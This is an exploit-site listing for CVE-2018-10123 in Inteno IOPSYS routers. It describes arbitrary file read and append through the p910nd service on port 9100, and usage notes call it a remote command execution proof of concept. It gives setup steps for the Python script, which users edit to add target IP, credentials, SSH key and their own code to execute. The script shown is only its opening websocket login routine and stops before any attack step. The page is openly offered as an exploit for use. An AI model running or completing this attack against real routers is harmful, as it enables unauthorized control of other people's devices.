Inteno IOPSYS 2.0 CVE-2018-10123 – Remote Command Execution

Authors:neonsea                 Risk:High

CVE:CVE-2018-10123             0day:Remote Command Execution 

0day -id:0DAY-176192            Date:2018-05-17

Description

p910nd on Inteno IOPSYS 2.0 through 4.2.0 allows remote attackers to read, or append data to, arbitrary files via requests on TCP port 9100. This vulnerability has been assigned the CVE ID: CVE-2018-10123.

Exploit

This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.

#!/usr/bin/python3
 
import json
import sys
import socket
import os
import time
from websocket import create_connection
 
def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:
        return(None)
    return(key)

Leave a Reply